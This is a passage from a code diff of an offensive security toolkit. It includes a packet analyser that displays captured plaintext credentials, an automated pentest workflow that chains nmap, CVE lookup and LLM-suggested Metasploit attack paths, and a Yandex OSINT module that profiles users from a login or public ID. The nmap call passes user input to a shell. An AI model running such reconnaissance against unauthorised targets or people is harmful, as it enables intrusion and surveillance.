requests = self.mgr.extract_http_requests()
if not requests:
self.print_status("No HTTP requests found.", "warning")
else:
for r in requests[:30]:
method = r.get('method', '?')
host = r.get('host', '')
path = r.get('path', '')[:60]
src = r.get('src', '')
color = Colors.GREEN if method == 'GET' else Colors.YELLOW
print(f" {color}{method:<7}{Colors.RESET} {host}{path} from {src}")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def credential_detection(self):
"""Detect plaintext credentials."""
print(f"\n{Colors.BOLD}Credential Detection{Colors.RESET}")
creds = self.mgr.extract_credentials()
if not creds:
self.print_status("No plaintext credentials detected.", "info")
else:
self.print_status(f"Found {len(creds)} credential artifacts!", "warning")
for c in creds:
print(f" {Colors.RED}[{c['protocol']}]{Colors.RESET} {c['type']}: {c['value']} ({c['src']} -> {c['dst']})")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def export_results(self):
"""Export packets."""
print(f"\n{Colors.BOLD}Export Results{Colors.RESET}")
print(f" {Colors.CYAN}[1]{Colors.RESET} Export as JSON")
print(f" {Colors.CYAN}[2]{Colors.RESET} Export as CSV")
choice = input(f"\n{Colors.WHITE}Select format: {Colors.RESET}").strip()
fmt = 'csv' if choice == '2' else 'json'
result = self.mgr.export_packets(fmt=fmt)
if 'error' in result:
self.print_status(result['error'], "error")
else:
self.print_status(f"Exported {result['count']} packets to {result['filepath']}", "success")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def run():
"""Module entry point."""
analyzer = PacketAnalyzer()
analyzer.show_menu()

549
modules/workflow.py Normal file
View File

@@ -0,0 +1,549 @@
"""
AUTARCH Workflow Module
Automated pentest pipeline orchestration
Run multi-step security assessments with automated data flow between tools.
"""
import os
import sys
import json
import subprocess
import re
import time
from pathlib import Path
from datetime import datetime
# Module metadata
DESCRIPTION = "Automated pentest workflow"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "offense"
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors, clear_screen, display_banner
class WorkflowRunner:
"""Orchestrate multi-step pentest workflows."""
def __init__(self):
self.results_dir = Path("results")
self.results_dir.mkdir(exist_ok=True)
def print_status(self, msg, level="info"):
icons = {"info": f"{Colors.CYAN}[*]", "success": f"{Colors.GREEN}[+]",
"warning": f"{Colors.YELLOW}[!]", "error": f"{Colors.RED}[-]"}
icon = icons.get(level, icons["info"])
print(f" {icon} {msg}{Colors.RESET}")
# =========================================================================
# MENU
# =========================================================================
def show_menu(self):
clear_screen()
display_banner()
print(f"{Colors.RED}{Colors.BOLD} Automated Workflow{Colors.RESET}")
print(f"{Colors.DIM} Multi-step pentest pipeline orchestration{Colors.RESET}")
print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
print()
print(f" {Colors.RED}[1]{Colors.RESET} New Workflow {Colors.DIM}- Full automated pipeline{Colors.RESET}")
print(f" {Colors.RED}[2]{Colors.RESET} Quick Scan {Colors.DIM}- Nmap → CVE → Report (no LLM){Colors.RESET}")
print(f" {Colors.RED}[3]{Colors.RESET} Resume Workflow {Colors.DIM}- Load saved state{Colors.RESET}")
print()
print(f" {Colors.DIM}[0]{Colors.RESET} Back")
print()
# =========================================================================
# NMAP SCAN (shared helper)
# =========================================================================
def _nmap_service_scan(self, target):
"""Run nmap service detection scan on target."""
self.print_status(f"Running nmap -sV -T4 on {target}...", "info")
try:
result = subprocess.run(
f"nmap -sV --top-ports 20 -T4 {target}",
shell=True, capture_output=True, text=True, timeout=300
)
if result.returncode != 0:
self.print_status("nmap scan failed", "error")
return []
services = []
port_re = re.compile(r'(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)')
for line in result.stdout.split('\n'):
m = port_re.match(line.strip())
if m:
parts = m.group(4).strip().split()
services.append({
'port': int(m.group(1)),
'protocol': m.group(2),
'service': parts[0] if parts else m.group(3),
'version': ' '.join(parts[1:]) if len(parts) > 1 else ''
})
self.print_status(f"Found {len(services)} open services", "success")
return services
except subprocess.TimeoutExpired:
self.print_status("nmap timed out after 5 minutes", "error")
return []
except Exception as e:
self.print_status(f"Scan error: {e}", "error")
return []
# =========================================================================
# CVE CORRELATION (shared helper)
# =========================================================================
def _correlate_cves(self, services):
"""Correlate services with CVEs from the database."""
try:
from core.cve import get_cve_db
cve_db = get_cve_db()
except Exception as e:
self.print_status(f"CVE database unavailable: {e}", "warning")
return []
SERVICE_TO_CPE = {
'apache': ('apache', 'http_server'), 'nginx': ('f5', 'nginx'),
'openssh': ('openbsd', 'openssh'), 'ssh': ('openbsd', 'openssh'),
'mysql': ('oracle', 'mysql'), 'postgresql': ('postgresql', 'postgresql'),
'samba': ('samba', 'samba'), 'smb': ('samba', 'samba'),
'vsftpd': ('vsftpd_project', 'vsftpd'), 'proftpd': ('proftpd', 'proftpd'),
'postfix': ('postfix', 'postfix'), 'dovecot': ('dovecot', 'dovecot'),
'php': ('php', 'php'), 'tomcat': ('apache', 'tomcat'),
'isc': ('isc', 'bind'), 'bind': ('isc', 'bind'),
}
correlations = []
for svc in services:
self.print_status(f"Checking CVEs for {svc['service']}:{svc.get('version', '?')} on port {svc['port']}...", "info")
cves = []
svc_lower = svc['service'].lower()
version = svc.get('version', '').split()[0] if svc.get('version') else ''
if svc_lower in SERVICE_TO_CPE and version:
vendor, product = SERVICE_TO_CPE[svc_lower]
cpe = f"cpe:2.3:a:{vendor}:{product}:{version}:*:*:*:*:*:*:*"
try:
cves = cve_db.search_cves(cpe_pattern=cpe)
except Exception:
pass
if not cves and version:
try:
cves = cve_db.search_cves(keyword=f"{svc['service']} {version}")
except Exception:
pass
if cves:
self.print_status(f" Found {len(cves)} CVEs", "success")
else:
self.print_status(f" No CVEs found", "info")
correlations.append({
'service': svc,
'cves': cves[:20] # cap per service
})
return correlations
# =========================================================================
# FULL WORKFLOW
# =========================================================================
def run_workflow(self, target):
"""Run full automated pentest workflow."""
clear_screen()
display_banner()
print(f"{Colors.RED}{Colors.BOLD} Full Workflow - {target}{Colors.RESET}")
print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
print()
state = {
'target': target,
'started': datetime.now().isoformat(),
'services': [],
'correlations': [],
'exploits': [],
'report': None,
'current_step': 1
}
state_file = self.results_dir / f"workflow_{target.replace('.', '-').replace('/', '_')}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
# Step 1: Nmap scan
print(f"\n{Colors.CYAN}{Colors.BOLD} Step 1/4: Service Detection{Colors.RESET}")
print(f"{Colors.DIM} {'' * 40}{Colors.RESET}")
services = self._nmap_service_scan(target)
state['services'] = services
state['current_step'] = 2
self._save_state(state, state_file)
if not services:
self.print_status("No services found. Workflow cannot continue.", "warning")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
return
cont = input(f"\n{Colors.WHITE} Continue to CVE correlation? [Y/n]: {Colors.RESET}").strip().lower()
if cont == 'n':
self.print_status(f"State saved to {state_file}", "info")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
return
# Step 2: CVE correlation
print(f"\n{Colors.CYAN}{Colors.BOLD} Step 2/4: CVE Correlation{Colors.RESET}")
print(f"{Colors.DIM} {'' * 40}{Colors.RESET}")
correlations = self._correlate_cves(services)
state['correlations'] = correlations
state['current_step'] = 3
self._save_state(state, state_file)
total_cves = sum(len(c.get('cves', [])) for c in correlations)
self.print_status(f"Total CVEs found: {total_cves}", "success" if total_cves > 0 else "info")
cont = input(f"\n{Colors.WHITE} Continue to exploit suggestion? [Y/n]: {Colors.RESET}").strip().lower()
if cont == 'n':
# Skip to report
self._generate_workflow_report(state)
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
return
# Step 3: Exploit suggestion (LLM)
print(f"\n{Colors.CYAN}{Colors.BOLD} Step 3/4: Exploit Suggestion{Colors.RESET}")
print(f"{Colors.DIM} {'' * 40}{Colors.RESET}")
exploits = self._suggest_exploits(services, correlations)
state['exploits'] = exploits
state['current_step'] = 4
self._save_state(state, state_file)
cont = input(f"\n{Colors.WHITE} Generate report? [Y/n]: {Colors.RESET}").strip().lower()
if cont == 'n':
self.print_status(f"State saved to {state_file}", "info")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
return
# Step 4: Report
print(f"\n{Colors.CYAN}{Colors.BOLD} Step 4/4: Report Generation{Colors.RESET}")
print(f"{Colors.DIM} {'' * 40}{Colors.RESET}")
self._generate_workflow_report(state)
state['current_step'] = 5
self._save_state(state, state_file)
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
# =========================================================================
# QUICK SCAN
# =========================================================================
def quick_scan(self, target):
"""Run quick scan: Nmap → CVE → Report (no LLM)."""
clear_screen()
display_banner()
print(f"{Colors.RED}{Colors.BOLD} Quick Scan - {target}{Colors.RESET}")
print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
print()
start_time = time.time()
# Step 1: Nmap
print(f"\n{Colors.CYAN}{Colors.BOLD} Step 1/3: Service Detection{Colors.RESET}")
print(f"{Colors.DIM} {'' * 40}{Colors.RESET}")
services = self._nmap_service_scan(target)
if not services:
self.print_status("No services found.", "warning")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
return
# Step 2: CVE correlation
print(f"\n{Colors.CYAN}{Colors.BOLD} Step 2/3: CVE Correlation{Colors.RESET}")
print(f"{Colors.DIM} {'' * 40}{Colors.RESET}")
correlations = self._correlate_cves(services)
total_cves = sum(len(c.get('cves', [])) for c in correlations)
self.print_status(f"Total CVEs found: {total_cves}", "success" if total_cves > 0 else "info")
# Step 3: Report
print(f"\n{Colors.CYAN}{Colors.BOLD} Step 3/3: Report Generation{Colors.RESET}")
print(f"{Colors.DIM} {'' * 40}{Colors.RESET}")
scan_time = time.time() - start_time
state = {
'target': target,
'services': services,
'correlations': correlations,
'exploits': [],
'scan_time': scan_time
}
self._generate_workflow_report(state)
self.print_status(f"Quick scan completed in {scan_time:.1f}s", "success")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
# =========================================================================
# RESUME WORKFLOW
# =========================================================================
def resume_workflow(self):
"""Resume a saved workflow from JSON state."""
clear_screen()
display_banner()
print(f"{Colors.RED}{Colors.BOLD} Resume Workflow{Colors.RESET}")
print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
print()
state_files = sorted(self.results_dir.glob("workflow_*.json"))
if not state_files:
self.print_status("No saved workflows found.", "warning")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
return
for i, f in enumerate(state_files, 1):
try:
with open(f, 'r') as fh:
data = json.load(fh)
target = data.get('target', '?')
step = data.get('current_step', '?')
started = data.get('started', '?')
print(f" {Colors.RED}[{i}]{Colors.RESET} {f.name}")
print(f" {Colors.DIM}Target: {target} | Step: {step}/4 | Started: {started}{Colors.RESET}")
except Exception:
print(f" {Colors.RED}[{i}]{Colors.RESET} {f.name} {Colors.DIM}(corrupt){Colors.RESET}")
print(f"\n {Colors.DIM}[0]{Colors.RESET} Back")
sel = input(f"\n{Colors.WHITE} Select: {Colors.RESET}").strip()
if sel == "0":
return
try:
idx = int(sel) - 1
with open(state_files[idx], 'r') as f:
state = json.load(f)
except (ValueError, IndexError, json.JSONDecodeError) as e:
self.print_status(f"Error: {e}", "error")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
return
target = state.get('target', '')
current_step = state.get('current_step', 1)
state_file = state_files[idx]
self.print_status(f"Resuming workflow for {target} at step {current_step}/4", "info")
if current_step <= 1:
services = self._nmap_service_scan(target)
state['services'] = services
state['current_step'] = 2
self._save_state(state, state_file)
else:
services = state.get('services', [])
if not services:
self.print_status("No services available.", "warning")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
return
if current_step <= 2:
print(f"\n{Colors.CYAN}{Colors.BOLD} Step 2/4: CVE Correlation{Colors.RESET}")
correlations = self._correlate_cves(services)
state['correlations'] = correlations
state['current_step'] = 3
self._save_state(state, state_file)
else:
correlations = state.get('correlations', [])
if current_step <= 3:
cont = input(f"\n{Colors.WHITE} Run exploit suggestion? [Y/n]: {Colors.RESET}").strip().lower()
if cont != 'n':
print(f"\n{Colors.CYAN}{Colors.BOLD} Step 3/4: Exploit Suggestion{Colors.RESET}")
exploits = self._suggest_exploits(services, correlations)
state['exploits'] = exploits
state['current_step'] = 4
self._save_state(state, state_file)
if current_step <= 4:
print(f"\n{Colors.CYAN}{Colors.BOLD} Step 4/4: Report Generation{Colors.RESET}")
self._generate_workflow_report(state)
state['current_step'] = 5
self._save_state(state, state_file)
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
# =========================================================================
# HELPERS
# =========================================================================
def _suggest_exploits(self, services, correlations):
"""Try LLM-based exploit suggestion, fallback to CVE-MSF lookup."""
exploits = []
# Collect all CVEs
all_cves = []
for corr in correlations:
for cve in corr.get('cves', []):
all_cves.append(cve)
if not all_cves:
self.print_status("No CVEs to suggest exploits for.", "info")
return []
# Try LLM
try:
from core.llm import get_llm
llm = get_llm()
if llm and llm.is_loaded():
self.print_status("Using LLM for exploit suggestions...", "info")
svc_text = "\n".join(
f"- {s['service']}:{s.get('version', '?')} on port {s['port']}"
for s in services
)
cve_text = "\n".join(
f"- {c.get('id', '?')} (CVSS {c.get('cvss', '?')}): {c.get('description', '')[:100]}"
for c in all_cves[:20]
)
prompt = f"""Given these services and vulnerabilities, suggest the top 5 attack paths.
Services:
{svc_text}
CVEs:
{cve_text}
For each suggestion provide: rank, Metasploit module path (if known), target service, CVE, and reasoning.
Format each as: N. MODULE | TARGET | CVE | REASONING"""
response = llm.generate(prompt)
if response:
# Parse suggestions
for line in response.split('\n'):
line = line.strip()
match = re.match(r'\d+\.\s*(.+?)\s*\|\s*(.+?)\s*\|\s*(.+?)\s*\|\s*(.+)', line)
if match:
exploits.append({
'module': match.group(1).strip(),
'target': match.group(2).strip(),
'cve': match.group(3).strip(),
'reasoning': match.group(4).strip()
})
if exploits:
self.print_status(f"LLM suggested {len(exploits)} attack paths", "success")
for i, exp in enumerate(exploits, 1):
print(f" {Colors.RED}{i}.{Colors.RESET} {exp['module']}{exp['target']} ({exp['cve']})")
return exploits
except Exception:
pass
# Fallback: CVE-to-MSF mapping
self.print_status("LLM unavailable, using CVE-to-MSF module lookup...", "warning")
try:
from core.msf_modules import search_modules
for cve in all_cves[:30]:
cve_id = cve.get('id', '')
if cve_id:
matches = search_modules(cve_id)
for mod_name, mod_info in matches:
exploits.append({
'module': mod_name,
'target': mod_info.get('description', '')[:60],
'cve': cve_id,
'reasoning': f"Direct CVE match (CVSS {cve.get('cvss', '?')})"
})
except Exception as e:
self.print_status(f"MSF module lookup failed: {e}", "warning")
if exploits:
self.print_status(f"Found {len(exploits)} exploit matches", "success")
for i, exp in enumerate(exploits[:10], 1):
print(f" {Colors.RED}{i}.{Colors.RESET} {exp['module']} ({exp['cve']})")
else:
self.print_status("No exploit matches found.", "info")
return exploits
def _generate_workflow_report(self, state):
"""Generate HTML report from workflow state."""
target = state.get('target', 'unknown')
# Build network_data from services
network_data = None
services = state.get('services', [])
if services:
network_data = [{
'ip': target,
'hostname': target,
'os_guess': '-',
'ports': services
}]
vuln_data = state.get('correlations') or None
exploit_data = state.get('exploits') or None
try:
from core.report_generator import get_report_generator
rg = get_report_generator()
report_path = rg.generate_pentest_report(
target=target,
network_data=network_data,
vuln_data=vuln_data,
exploit_data=exploit_data
)
self.print_status(f"Report saved to {report_path}", "success")
state['report'] = report_path
except Exception as e:
self.print_status(f"Report generation failed: {e}", "error")
def _save_state(self, state, state_file):
"""Save workflow state to JSON."""
try:
# Make serializable - convert CVE objects if needed
serializable = json.loads(json.dumps(state, default=str))
with open(state_file, 'w') as f:
json.dump(serializable, f, indent=2)
except Exception:
pass
# =========================================================================
# MAIN LOOP
# =========================================================================
def run(self):
"""Main menu loop."""
while True:
self.show_menu()
try:
choice = input(f"{Colors.WHITE} Select: {Colors.RESET}").strip()
if choice == "0":
break
elif choice == "1":
target = input(f"\n{Colors.WHITE} Target IP/hostname: {Colors.RESET}").strip()
if target:
self.run_workflow(target)
elif choice == "2":
target = input(f"\n{Colors.WHITE} Target IP/hostname: {Colors.RESET}").strip()
if target:
self.quick_scan(target)
elif choice == "3":
self.resume_workflow()
except (EOFError, KeyboardInterrupt):
print()
break
def run():
"""Module entry point."""
runner = WorkflowRunner()
runner.run()
if __name__ == "__main__":
run()

326
modules/yandex_osint.py Normal file
View File

@@ -0,0 +1,326 @@
"""
AUTARCH Yandex OSINT Module
Gather information about Yandex users from their login, email, or public links
"""
import json
import os
import sys
import webbrowser
from pathlib import Path
# Add parent directory to path for imports
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors
# Module metadata
NAME = "Yandex OSINT"
DESCRIPTION = "Gather intel from Yandex user accounts"
AUTHOR = "darkHal Security Group"
VERSION = "1.0"
CATEGORY = "osint"
# Try to import requests
try:
import requests
except ImportError:
requests = None
class YandexParser:
"""Parser for Yandex user information."""
def __init__(self):
self.session = None
self.timeout = 10
self.user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36"
self._init_session()
def _init_session(self):
"""Initialize requests session."""
if requests is None:
return
self.session = requests.Session()
adapter = requests.adapters.HTTPAdapter(max_retries=2)
self.session.mount('https://', adapter)
self.session.mount('http://', adapter)
self.session.headers.update({'User-Agent': self.user_agent})
def lookup_by_login(self, login: str) -> dict:
"""Lookup Yandex user by login/email.
Args:
login: Yandex login or email.
Returns:
Dict with user information.
"""
# Strip domain from email
login = login.split('@')[0].strip()
if not login:
return {'error': 'Invalid login'}
result = {
'login': login,
'email': f"{login}@yandex.ru",
'display_name': None,
'public_id': None,
'avatar_url': None,
'profiles': {},
}
print(f"{Colors.CYAN}[*] Looking up Yandex user: {login}{Colors.RESET}")
# Query Yandex Collections API
try:
url = f"https://yandex.ru/collections/api/users/{login}/"
response = self.session.get(url, timeout=self.timeout)
if response.status_code == 200:
data = response.json()
if data.get('title') == "404 Not Found":
result['error'] = 'User not found'
return result
result['display_name'] = data.get('display_name')
result['public_id'] = data.get('public_id')
avatar_id = data.get('default_avatar_id')
if avatar_id:
result['avatar_url'] = f"https://avatars.mds.yandex.net/get-yapic/{avatar_id}/islands-300"
# Build profile URLs
pub_id = result['public_id']
if pub_id:
result['profiles'] = {
'reviews': f"https://reviews.yandex.ru/user/{pub_id}",
'market': f"https://market.yandex.ru/user/{pub_id}/reviews",
'dzen': f"https://zen.yandex.ru/user/{pub_id}",
'qa': f"https://yandex.ru/q/profile/{pub_id}/",
}
result['profiles']['music'] = f"https://music.yandex.ru/users/{login}/tracks"
result['profiles']['disk'] = f"https://disk.yandex.ru/client/disk"
print(f"{Colors.GREEN}[+] User found!{Colors.RESET}")
elif response.status_code == 404:
result['error'] = 'User not found'
else:
result['error'] = f'API error: {response.status_code}'
except requests.exceptions.RequestException as e:
result['error'] = f'Network error: {str(e)}'
except json.JSONDecodeError:
result['error'] = 'Invalid API response'
except Exception as e:
result['error'] = f'Error: {str(e)}'
return result
def lookup_by_disk_link(self, url: str) -> dict:
"""Extract user info from Yandex.Disk public link.
Args:
url: Public Yandex.Disk link.
Returns:
Dict with user information.
"""
print(f"{Colors.CYAN}[*] Extracting user from Yandex.Disk link...{Colors.RESET}")
try:
response = self.session.get(url, timeout=self.timeout)
if response.status_code != 200:
return {'error': 'Failed to fetch disk link'}
# Extract displayName from page
try:
login = response.text.split('displayName":"')[1].split('"')[0]
except (IndexError, AttributeError):
return {'error': 'Could not extract user from link'}
if not login:
return {'error': 'No user found in link'}
print(f"{Colors.GREEN}[+] Extracted login: {login}{Colors.RESET}")
return self.lookup_by_login(login)
except Exception as e:
return {'error': f'Error: {str(e)}'}
def lookup_by_public_id(self, public_id: str) -> dict:
"""Lookup user by Yandex public ID.
Args:
public_id: 26-character Yandex user identifier.
Returns:
Dict with user information.
"""
if len(public_id) != 26:
return {'error': 'Invalid public ID (must be 26 characters)'}
result = {
'public_id': public_id,
'profiles': {
'reviews': f"https://reviews.yandex.ru/user/{public_id}",
'market': f"https://market.yandex.ru/user/{public_id}/reviews",
'dzen': f"https://zen.yandex.ru/user/{public_id}",
'qa': f"https://yandex.ru/q/profile/{public_id}/",
}
}
print(f"{Colors.CYAN}[*] Looking up public ID: {public_id}{Colors.RESET}")
# Try to get more info from collections API
try:
url = f"https://yandex.ru/collections/api/users/{public_id}/"
response = self.session.get(url, timeout=self.timeout)
if response.status_code == 200:
data = response.json()
if data.get('title') != "404 Not Found":
result['display_name'] = data.get('display_name')
avatar_id = data.get('default_avatar_id')
if avatar_id:
result['avatar_url'] = f"https://avatars.mds.yandex.net/get-yapic/{avatar_id}/islands-300"
except Exception:
pass
print(f"{Colors.GREEN}[+] Profile URLs generated!{Colors.RESET}")
return result
def display_result(result: dict, open_browser: bool = False):
"""Display lookup result nicely.
Args:
result: Lookup result dict.
open_browser: Whether to open URLs in browser.
"""
if 'error' in result:
print(f"{Colors.RED}[X] {result['error']}{Colors.RESET}")
return
print(f"\n{Colors.CYAN}{'=' * 55}{Colors.RESET}")
print(f"{Colors.GREEN}{Colors.BOLD} YANDEX USER PROFILE{Colors.RESET}")
print(f"{Colors.CYAN}{'=' * 55}{Colors.RESET}")
if result.get('display_name'):
print(f" {Colors.GREEN}Name:{Colors.RESET} {result['display_name']}")
if result.get('login'):
print(f" {Colors.GREEN}Login:{Colors.RESET} {result['login']}")
if result.get('email'):
print(f" {Colors.GREEN}Email:{Colors.RESET} {result['email']}")
if result.get('public_id'):
print(f" {Colors.GREEN}Public ID:{Colors.RESET} {result['public_id']}")
if result.get('avatar_url'):
print(f"\n {Colors.GREEN}Avatar:{Colors.RESET}")
print(f" {Colors.DIM}{result['avatar_url']}{Colors.RESET}")
profiles = result.get('profiles', {})
if profiles:
print(f"\n {Colors.GREEN}Yandex Services:{Colors.RESET}")
for name, url in profiles.items():
print(f" {Colors.CYAN}{name.title()}:{Colors.RESET} {url}")
if open_browser:
try:
webbrowser.open(url)
except Exception:
pass
print()
def display_menu():
"""Display the Yandex OSINT module menu."""
print(f"""
{Colors.CYAN} Yandex OSINT{Colors.RESET}
{Colors.DIM} Gather intelligence from Yandex user accounts{Colors.RESET}
{Colors.DIM}{'' * 55}{Colors.RESET}
{Colors.GREEN}[1]{Colors.RESET} Lookup by Login/Email
{Colors.GREEN}[2]{Colors.RESET} Lookup by Yandex.Disk Public Link
{Colors.GREEN}[3]{Colors.RESET} Lookup by Public ID (26-char hash)
{Colors.RED}[0]{Colors.RESET} Back to OSINT Menu
""")
def run():
"""Main entry point for the module."""
if requests is None:
print(f"{Colors.RED}[X] This module requires 'requests' library{Colors.RESET}")
print(f"{Colors.DIM} Install with: pip install requests{Colors.RESET}")
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
return
parser = YandexParser()
while True:
display_menu()
choice = input(f"{Colors.GREEN}Select option: {Colors.RESET}").strip()
if choice == '0':
break
elif choice == '1':
print(f"\n{Colors.CYAN}Enter Yandex login or email:{Colors.RESET}")
print(f"{Colors.DIM}Example: username or username@yandex.ru{Colors.RESET}")
login = input(f"\n{Colors.GREEN}Login: {Colors.RESET}").strip()
if not login:
continue
result = parser.lookup_by_login(login)
open_links = input(f"\n{Colors.YELLOW}Open profile links in browser? (y/n): {Colors.RESET}").strip().lower()
display_result(result, open_browser=(open_links == 'y'))
input(f"{Colors.DIM}Press Enter to continue...{Colors.RESET}")
elif choice == '2':
print(f"\n{Colors.CYAN}Enter Yandex.Disk public link:{Colors.RESET}")
print(f"{Colors.DIM}Example: https://yadi.sk/d/xxxxx{Colors.RESET}")
url = input(f"\n{Colors.GREEN}URL: {Colors.RESET}").strip()
if not url:
continue
result = parser.lookup_by_disk_link(url)
open_links = input(f"\n{Colors.YELLOW}Open profile links in browser? (y/n): {Colors.RESET}").strip().lower()
display_result(result, open_browser=(open_links == 'y'))
input(f"{Colors.DIM}Press Enter to continue...{Colors.RESET}")
elif choice == '3':
print(f"\n{Colors.CYAN}Enter Yandex public ID (26 characters):{Colors.RESET}")
print(f"{Colors.DIM}Example: tr6r2c8ea4tvdt3xmpy5atuwg0{Colors.RESET}")
pub_id = input(f"\n{Colors.GREEN}Public ID: {Colors.RESET}").strip()
if not pub_id:
continue
result = parser.lookup_by_public_id(pub_id)
open_links = input(f"\n{Colors.YELLOW}Open profile links in browser? (y/n): {Colors.RESET}").strip().lower()
display_result(result, open_browser=(open_links == 'y'))
input(f"{Colors.DIM}Press Enter to continue...{Colors.RESET}")
else:
print(f"{Colors.RED}[!] Invalid option{Colors.RESET}")
if __name__ == "__main__":
run()